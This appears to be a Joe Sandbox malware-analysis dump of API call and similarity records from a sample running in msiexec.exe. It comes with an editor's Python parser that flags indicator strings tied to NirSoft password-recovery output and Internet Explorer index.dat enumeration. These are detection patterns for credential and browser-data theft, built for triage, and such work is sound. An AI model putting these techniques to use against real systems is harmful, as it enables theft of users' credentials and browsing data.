                                                                                                                                                • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
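The records above are the Joe Sandbox function-similarity entries for the code running in msiexec.exe (snapshot hcaresult_13_2_400000_msiexec.jbxd): the "/stext" string compared with _wcsicmp is the save-as-text switch the NirSoft password recovery tools accept, and the "*.*$index.dat" FindFirstFile pattern enumerates Internet Explorer cache and history indexes. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses records in the layout rendered on this page (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin and Similarity blocks with bullet-prefixed lines, "ref:" and "xrefs:" addresses), keeps the "Part of subcall function" attribution, and flags the two indicator strings so a triage pass can pivot on the Opcode ID of the flagged functions. The indicator annotations are the editor's reading, and the sample input is constructed from three of the records above, trimmed.

```python
"""Parse Joe Sandbox function-similarity records into dicts and flag
credential-harvesting strings. Added example, not report tooling; it assumes
the record layout rendered on this page."""
import re
from typing import Dict, List

SECTIONS = {"APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.Module(args), ref: ADDR" or "• Name.Module ref: ADDR", optionally
# prefixed with "Part of subcall function CALLER: ".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
STR_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")

# Indicator strings taken from the records on this page; the annotations are
# the editor's reading of them, not report output.
INDICATORS = {
    "/stext": "NirSoft 'save as text' switch (password recovery tools)",
    "index.dat": "IE cache/history index enumeration (browser data theft)",
}


def parse_records(text: str) -> List[Dict]:
    """Split a dump into one dict per function record."""
    records: List[Dict] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            # Similarity is the last block of every record, so an APIs or
            # Strings header seen after it opens a new record.
            if rec is None or (line in ("APIs", "Strings")
                               and "Similarity" in rec["seen"]):
                rec = {"apis": [], "strings": [], "meta": {}, "seen": set()}
                records.append(rec)
            rec["seen"].add(line)
            section = line
            continue
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                rec["apis"].append(m.groupdict())
        elif section == "Strings":
            m = STR_RE.match(item)
            if m:
                rec["strings"].append(m.groupdict())
        elif section is not None:  # "Key: value" lines of the other blocks
            key, _, val = item.partition(":")
            rec["meta"][key.strip()] = val.strip()
    for r in records:
        r.pop("seen")
    return records


def flag_indicators(rec: Dict) -> List[str]:
    """Indicator hits in a record's String ID field or Strings block."""
    haystack = [rec["meta"].get("String ID", "")]
    haystack += [s["text"] for s in rec["strings"]]
    return [f"{marker}: {why}" for marker, why in INDICATORS.items()
            if any(marker.lower() in h.lower() for h in haystack)]


def summarize(text: str) -> List[Dict]:
    """One triage row per record: Opcode ID, API ID, resolved calls, hits."""
    rows = []
    for rec in parse_records(text):
        rows.append({
            "opcode_id": rec["meta"].get("Opcode ID", ""),
            "api_id": rec["meta"].get("API ID", ""),
            "calls": [f"{a['module']}!{a['name']}@{a['ref']}" for a in rec["apis"]],
            "subcalls": sum(1 for a in rec["apis"] if a["caller"]),
            "indicators": flag_indicators(rec),
        })
    return rows


# Constructed sample: three records copied from this page's dump, trimmed.
SAMPLE = """\
APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
• GetLastError.KERNEL32 ref: 004175A2
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
• CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
APIs
Strings
Similarity
• API ID: _wcsicmp
• String ID: /stext
• Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
"""
```

Running summarize(SAMPLE) yields three rows; only the _wcsicmp record carries an indicator hit, and its Opcode ID is the value to search for in other reports of the same family. Records whose APIs block is empty on the page (the memset and _wcsicmp entries above) still parse, since the API ID and String ID fields in the Similarity block are what the indicator check reads.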

APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
• Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
• Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
• Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
• Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9

APIs
• memset.MSVCRT ref: 0041BDDF
• memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
• Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
• Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
• Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
• Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99

APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• CloseHandle.KERNELBASE(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
• API String ID: 1381354015-0
• Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
• Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
• Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
• Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
• Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08

APIs
  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: File$Time$CloseCompareCreateHandlememset
• String ID:
• API String ID: 2154303073-0
• Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
• Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
• Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
• Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95

APIs
  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
• Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
• Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
• Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
• Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC

APIs
• SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
• Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
• Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25

APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
• Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
• Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
• Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
• Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59

APIs
• FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
• Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
• Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
• Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54

APIs
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$FileModuleName
• String ID:
• API String ID: 3859505661-0
• Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
• Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
• Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
• Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                APIs
                                                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                APIs
                                                                                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseFind
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
APIs
• GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
• Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
• Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
• Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00

Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
• Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
• Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
• Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA

APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
